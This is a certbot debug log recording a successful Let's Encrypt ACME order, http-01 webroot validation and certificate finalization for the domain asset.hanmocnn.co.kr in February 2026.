2026-02-14 22:59:02,445:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
2026-02-14 22:59:02,447:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
2026-02-14 22:59:02,450:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
2026-02-14 22:59:02,976:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
2026-02-14 22:59:02,977:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:59:02 GMT
Content-Type: application/json
Content-Length: 1033
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"cljAeBYjZ0g": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
"meta": {
"caaIdentities": [
"letsencrypt.org"
],
"profiles": {
"classic": "https://letsencrypt.org/docs/profiles#classic",
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
},
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
"website": "https://letsencrypt.org"
},
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
}
2026-02-14 22:59:02,978:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for asset.hanmocnn.co.kr
2026-02-14 22:59:02,983:DEBUG:acme.client:Requesting fresh nonce
2026-02-14 22:59:02,983:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
2026-02-14 22:59:03,142:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
2026-02-14 22:59:03,142:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:59:03 GMT
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: 4AH-2vvB1NQKZWcJ22HFe1FZKhiyJu9QRwMnohd6vOI912fg_tI
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
2026-02-14 22:59:03,143:DEBUG:acme.client:Storing nonce: 4AH-2vvB1NQKZWcJ22HFe1FZKhiyJu9QRwMnohd6vOI912fg_tI
2026-02-14 22:59:03,143:DEBUG:acme.client:JWS payload:
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "asset.hanmocnn.co.kr"\n }\n ]\n}'
2026-02-14 22:59:03,149:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QjFOUUtaV2NKMjJIRmUxRlpLaGl5SnU5UVJ3TW5vaGQ2dk9JOTEyZmdfdEkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
"signature": "Cia2CAWpEnKE6nmYpWaxkKmDemJ8nir20XHQA5qOB5uajnyQG8z_f9DYWFgfyXg1I3fOolmBCtFk3vYohJZWNLJu-37JWsUUxW9YYjiGRvnOgAAzBZ9yKNaf8fVxyl-6IFYN1sYcksvjZ8xPMa4gpJi7HFPeTupLp7twmLXmEUlCwCEQVZsKTi3RyVDGJ3cakSYBWxSog2oPAyahHnw5qgqVBD9u-aILs5jZ3VmR2dJrQL3NNOSD5btMIt64jghNAD2cAbZL5FBbr2IdBx_WXCQ0S6X9cxHGSnyfMC9x2-GDQIBoRlSZ8kzHKtPRpAKeqm7v4QmXkpzdkdlO2USf8g",
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImFzc2V0Lmhhbm1vY25uLmNvLmtyIgogICAgfQogIF0KfQ"
}
2026-02-14 22:59:03,327:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 354
2026-02-14 22:59:03,328:DEBUG:acme.client:Received response:
HTTP 201
Server: nginx
Date: Sat, 14 Feb 2026 22:59:03 GMT
Content-Type: application/json
Content-Length: 354
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606
Replay-Nonce: 4AH-2vvBInvPnj6082NjF7VfMGVMq5rvdAk0tdUzHfk2LBQiN_U
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "pending",
"expires": "2026-02-21T22:59:03Z",
"identifiers": [
{
"type": "dns",
"value": "asset.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606"
}
2026-02-14 22:59:03,328:DEBUG:acme.client:Storing nonce: 4AH-2vvBInvPnj6082NjF7VfMGVMq5rvdAk0tdUzHfk2LBQiN_U
2026-02-14 22:59:03,328:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:59:03,333:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QkludlBuajYwODJOakY3VmZNR1ZNcTVydmRBazB0ZFV6SGZrMkxCUWlOX1UiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0",
"signature": "jsBiP_GinWoex0fg3-Cdea-VuKuiTqzQnoZwpkLhn9rxAkYe6vmD2P6rY4u9tgtr-Ln-z6-Y0whY1jMYThfea6ncRWvgmaw2w520eoGFPda-InNb0JWJ5XHM93ItsdYs228hM1EB8EUTq-ARcB2LhXxaiuUK3kFOFmoln9Ekfo0Ow53-wG-roUIuAEwG2FtX8J_oxn-1fzm7FURWyV2oZLrDBQLtk05flxl7YbftjHKW1e0ukuC-1yiTmDr1ABIVCffIrU6gr_oKXL6IWObVfjIWWEgqXSpMH7HFtW5Kql73qjaarl-Tyz86POly2UQHtitudZ7xX0OYnbDZMRFDyw",
"payload": ""
}
2026-02-14 22:59:03,495:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 828
2026-02-14 22:59:03,496:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:59:03 GMT
Content-Type: application/json
Content-Length: 828
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: NeKnt8TGeS1KvxtCH01Kudwai4J_7cvf6w6TlwiwGz_1lyO0dIQ
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "asset.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T22:59:03Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg",
"status": "pending",
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA",
"status": "pending",
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/ZQcSng",
"status": "pending",
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
}
]
}
2026-02-14 22:59:03,496:DEBUG:acme.client:Storing nonce: NeKnt8TGeS1KvxtCH01Kudwai4J_7cvf6w6TlwiwGz_1lyO0dIQ
2026-02-14 22:59:03,497:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA', 'status': 'pending', 'token': '_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs'}
2026-02-14 22:59:03,497:INFO:certbot._internal.auth_handler:Performing the following challenges:
2026-02-14 22:59:03,497:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='asset.hanmocnn.co.kr')
2026-02-14 22:59:03,497:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
2026-02-14 22:59:03,498:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
2026-02-14 22:59:03,499:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs
2026-02-14 22:59:03,500:DEBUG:acme.client:JWS payload:
b'{}'
2026-02-14 22:59:03,504:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2VTMUt2eHRDSDAxS3Vkd2FpNEpfN2N2ZjZ3NlRsd2l3R3pfMWx5TzBkSVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2L2JXWS10ZyJ9",
"signature": "AB8QdQhOPhFKnAgDOMQR-4cKyHUTqsh8px5OEL8IPwcA1TUlP_ok0X7p1t6Y8akwLyCZl-hYngxHDbdJuSk3bEx2d3HzzCHIy7IoMEUXDa8Q0N1SAO1MNp0xdcGLFS8VwJwj29of318S7J1K0U3JvwFmY7sSzjqEm9TBTydWpu1BPNr64DLLPuyFIVks3Z14GYzVSzIMHtkNU19FcD25hFr8IkUfAgFdxKnoYwF0g6tdX9VzMUaMFOkQo4FPVb0q5ofDdsojIAaETvynTPGUx3Gi2RnS-WPRZW2dODiWTbMcNhoTo_qvGFTup29GyGf26mmTLID0xPohUABm9qx-8A",
"payload": "e30"
}
2026-02-14 22:59:03,679:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658770786636/bWY-tg HTTP/1.1" 200 195
2026-02-14 22:59:03,680:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:59:03 GMT
Content-Type: application/json
Content-Length: 195
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636>;rel="up"
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg
Replay-Nonce: NeKnt8TGRpLEM98vPidFNGYZLhniMzbW0ZgaRAcNcHMdxsudar4
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg",
"status": "pending",
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
}
2026-02-14 22:59:03,680:DEBUG:acme.client:Storing nonce: NeKnt8TGRpLEM98vPidFNGYZLhniMzbW0ZgaRAcNcHMdxsudar4
2026-02-14 22:59:03,681:INFO:certbot._internal.auth_handler:Waiting for verification...
2026-02-14 22:59:04,681:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:59:04,686:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR1JwTEVNOTh2UGlkRk5HWVpMaG5pTXpiVzBaZ2FSQWNOY0hNZHhzdWRhcjQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0",
"signature": "lqMsMOa-tUArJGS6N0hsMij68VjUFY48A2N6C_ro3al7tuGMf1XEiIEmRFGlK3X0X8IsrQPx4ej6Q22199sngBR1VJpP2X5mL8MYNQ2DipAlvMnWuNs8LUqsNRo05eKZoP1TbVp39qG6LklndIiCbuyxCcHJ3DKFpQzbOURUqAX_rbJfEkNQ3NHBgkkMFieByCnag80G9H2PfhHp26mYg4l0NTqRPc1Eii7yg70oMwer-gAzrsi4xwHACrD-LwQD3Eok7CLzaXlyu81UGVXFMVLYKEgbisAK_UtUVJlxfKjV6gvFpNpL_4VskR4LLoUFJ_X9LBnsqH5r-kz21Wlxkg",
"payload": ""
}
2026-02-14 22:59:04,850:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 828
2026-02-14 22:59:04,851:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:59:04 GMT
Content-Type: application/json
Content-Length: 828
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: NeKnt8TGHW4lMhMmVdh1Jz0VwzPkUfV13XBXPHC3SxBVS6LSJd0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "asset.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T22:59:03Z",
"challenges": [
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA",
"status": "pending",
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/ZQcSng",
"status": "pending",
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
},
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg",
"status": "pending",
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
}
]
}
2026-02-14 22:59:04,851:DEBUG:acme.client:Storing nonce: NeKnt8TGHW4lMhMmVdh1Jz0VwzPkUfV13XBXPHC3SxBVS6LSJd0
2026-02-14 22:59:04,851:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA', 'status': 'pending', 'token': '_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs'}
2026-02-14 22:59:07,852:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:59:07,857:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0hXNGxNaE1tVmRoMUp6MFZ3elBrVWZWMTNYQlhQSEMzU3hCVlM2TFNKZDAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0",
"signature": "QCjdqTcoky09Iivejj8OrcpoMGEMjAELmU5tH_5Fapt_tiHcaVIR5Vc3NBiO7vfeebmwEIIzADkvwHoqG7Epms-H4nQShQDPZdXdCxiry3x1DEVa2-3U-aPAiNN28I7WKMQNgipHA0EzT5b9QZzgs5g-Y-bz7kAOrggvBD9e9jejCbP0H0XHMbjqayajRwqppuetN2q7pyN2mTah6ytKL2x1k7NMhJZ124DQeZcAVn9AQlCU-_fbr9vgvzW9d5YqnBTTkQUGsiSC1M1HZ4oYm8yYTuuje-fIIvtWRxUeXvsUrPIsMhFOH-7foMWyNr0upwf1r7Ifo1K9NVtpJb6svg",
"payload": ""
}
2026-02-14 22:59:08,018:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 828
2026-02-14 22:59:08,019:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:59:07 GMT
Content-Type: application/json
Content-Length: 828
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: NeKnt8TG7x2394sOWVy6kZh5Ix7io-g9_X7c9_aBMoyHXO7TPBg
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "asset.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T22:59:03Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg",
"status": "pending",
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA",
"status": "pending",
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/ZQcSng",
"status": "pending",
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
}
]
}
2026-02-14 22:59:08,019:DEBUG:acme.client:Storing nonce: NeKnt8TG7x2394sOWVy6kZh5Ix7io-g9_X7c9_aBMoyHXO7TPBg
2026-02-14 22:59:08,019:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA', 'status': 'pending', 'token': '_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs'}
2026-02-14 22:59:11,020:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:59:11,025:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhURzd4MjM5NHNPV1Z5NmtaaDVJeDdpby1nOV9YN2M5X2FCTW95SFhPN1RQQmciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0",
"signature": "Ldxrn7k1DP_uQlFHFvMQhUxVgFGNXgyB5QwZ6J6zt-QILlDAJemOF6XxvpEoan56zOoTQFAF-E4a4Fb_T69BZGzHLwqbLd7pvsu6BpfIZ9BKqy3CiOPyd6P3aeYUNz2G9oblHxaUTj76yhRZ4LreMMUoZBIOX9TsAzA-AjqT2f4FtnPTCNvFfd4HjvjSFAz1MBcnCBeL4I2YXooKtGAUMD-tawfZbZMw2nXavM1dQS16jLrWVGEU3fAB2oAlsW8fz5oZCgQf-nhYmzfillCzb1n3G7D_FstbVcOSAdcMn2KxfndxwXf_HzLKaVxXe_WbCn4ojRQfCB_ecNdRk4XWbw",
"payload": ""
}
2026-02-14 22:59:11,189:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 783
2026-02-14 22:59:11,190:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:59:11 GMT
Content-Type: application/json
Content-Length: 783
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: NeKnt8TGRU1HvCLUtMedL_PWvsFY5XO4Pk_SF1R_Oj27V3w8DBY
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "asset.hanmocnn.co.kr"
},
"status": "valid",
"expires": "2026-03-16T22:59:09Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg",
"status": "valid",
"validated": "2026-02-14T22:59:03Z",
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs",
"validationRecord": [
{
"url": "http://asset.hanmocnn.co.kr/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs",
"hostname": "asset.hanmocnn.co.kr",
"port": "80",
"addressesResolved": [
"222.117.41.51"
],
"addressUsed": "222.117.41.51"
}
]
}
]
}
2026-02-14 22:59:11,190:DEBUG:acme.client:Storing nonce: NeKnt8TGRU1HvCLUtMedL_PWvsFY5XO4Pk_SF1R_Oj27V3w8DBY
2026-02-14 22:59:11,191:DEBUG:certbot._internal.error_handler:Calling registered functions
2026-02-14 22:59:11,191:INFO:certbot._internal.auth_handler:Cleaning up challenges
2026-02-14 22:59:11,191:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs
2026-02-14 22:59:11,191:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
2026-02-14 22:59:11,192:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKTCBsQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50LGZLNqLZ\nI+HF8yTMleRX+LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774/89oqy/XC6K\nS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO/CioDIwMAYJKoZIhvcN\nAQkOMSMwITAfBgNVHREEGDAWghRhc3NldC5oYW5tb2Nubi5jby5rcjAKBggqhkjO\nPQQDAgNnADBkAjBHU9b6je1e67iRpIKL75f+XH4fD4znqweIKxf4wcy7cuSnwIen\n35GhFB+6DqQXeRgCMEc5DM/pAiGgSrRTP1U2QZ8qDZgOJl+GRANbmOGaBo22tBrf\nLPi9rBm2X2PP6tQNKw==\n-----END CERTIFICATE REQUEST-----\n', form='pem')
2026-02-14 22:59:11,192:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-14 23:00:41.192628
2026-02-14 22:59:11,193:DEBUG:acme.client:JWS payload:
b'{\n "csr": "MIIBKTCBsQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50LGZLNqLZI-HF8yTMleRX-LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774_89oqy_XC6KS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO_CioDIwMAYJKoZIhvcNAQkOMSMwITAfBgNVHREEGDAWghRhc3NldC5oYW5tb2Nubi5jby5rcjAKBggqhkjOPQQDAgNnADBkAjBHU9b6je1e67iRpIKL75f-XH4fD4znqweIKxf4wcy7cuSnwIen35GhFB-6DqQXeRgCMEc5DM_pAiGgSrRTP1U2QZ8qDZgOJl-GRANbmOGaBo22tBrfLPi9rBm2X2PP6tQNKw"\n}'
2026-02-14 22:59:11,197:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR1JVMUh2Q0xVdE1lZExfUFd2c0ZZNVhPNFBrX1NGMVJfT2oyN1YzdzhEQlkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwMzYwNzAxNjA2In0",
"signature": "XnpECPUS8omlpPj4uWeSuoaPg43d5qm1xHW-myYldQmE-Fj_xEfiBLY66cGWDy83FPo5UEkMjKAemg38qC8u0UbGz8aMZPtAJbvYfdv9kCr6v-vJZp345dl4M0_bSmZEAZRRO08UYab3Af1lfDUlp6LB2AbkXBWZ0cp1crluoNOGY5MFLQILwS2hdCkIV0vFbUPyzyZF7xC9rJ3F2hl07OoyqoBcHHwwifsynUeYm0V9XrYhJ0T8bQErHvGNQMTmfrQC32eT-hmK1tSJ4Vp5yza_Ac0xoK3hv0GftuXJzkXEc5qXzREW29k18PFpM8fn6rrgyM7jHR8kKnCFVJViRA",
"payload": "ewogICJjc3IiOiAiTUlJQktUQ0JzUUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFWFp1V3d3NTBMR1pMTnFMWkktSEY4eVRNbGVSWC1McG1vR0xVTkZHeGdZU0F6VmdMcWt3emRZdENaV2daVWVYM1J6Nzc0Xzg5b3F5X1hDNktTMTJIUjNaQndZSEd1aFdXYkpQNGJaYnY2N0FKWmQ1VUhka2NjTmE5d3lCRU9fQ2lvREl3TUFZSktvWklodmNOQVFrT01TTXdJVEFmQmdOVkhSRUVHREFXZ2hSaGMzTmxkQzVvWVc1dGIyTnViaTVqYnk1cmNqQUtCZ2dxaGtqT1BRUURBZ05uQURCa0FqQkhVOWI2amUxZTY3aVJwSUtMNzVmLVhINGZENHpucXdlSUt4ZjR3Y3k3Y3VTbndJZW4zNUdoRkItNkRxUVhlUmdDTUVjNURNX3BBaUdnU3JSVFAxVTJRWjhxRFpnT0psLUdSQU5ibU9HYUJvMjJ0QnJmTFBpOXJCbTJYMlBQNnRRTkt3Igp9"
}
2026-02-14 22:59:13,485:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480360701606 HTTP/1.1" 200 456
2026-02-14 22:59:13,486:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:59:13 GMT
Content-Type: application/json
Content-Length: 456
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606
Replay-Nonce: NeKnt8TGkiAFymgyXx91sjo-OBrE-oQfkAIA5BkETAcVbXDQlto
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "valid",
"expires": "2026-02-21T22:59:03Z",
"identifiers": [
{
"type": "dns",
"value": "asset.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606",
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5"
}
